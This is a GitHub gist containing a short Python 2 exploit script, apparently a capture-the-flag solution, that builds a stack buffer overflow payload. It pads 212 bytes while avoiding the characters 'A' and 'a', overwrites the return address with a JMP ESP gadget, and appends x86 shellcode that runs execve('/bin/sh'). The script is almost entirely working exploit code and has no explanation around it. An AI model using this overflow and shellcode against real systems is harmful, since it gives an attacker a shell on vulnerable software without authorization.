Created
November 4, 2016 10:40
-
-
Save scarvell/423d394201931ef88403cf39d0fcf684 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct | |
| def p(x): | |
| return struct.pack('<I', x) | |
| # We can't use 0x41 or 0x61 | |
| buffer = "B" * 212 | |
| buffer += p(0x8048650) # JMP ESP | |
| buffer += "\x90" | |
| # /bin/sh | |
| buffer += "\x31\xc0" # xor eax,eax | |
| buffer += "\x31\xd2" # xor edx,edx | |
| buffer += "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" | |
| buffer += "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" | |
| buffer += "\n" | |
| buffer += str(len(buffer)/2) | |
| buffer += "\n" | |
| print buffer |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment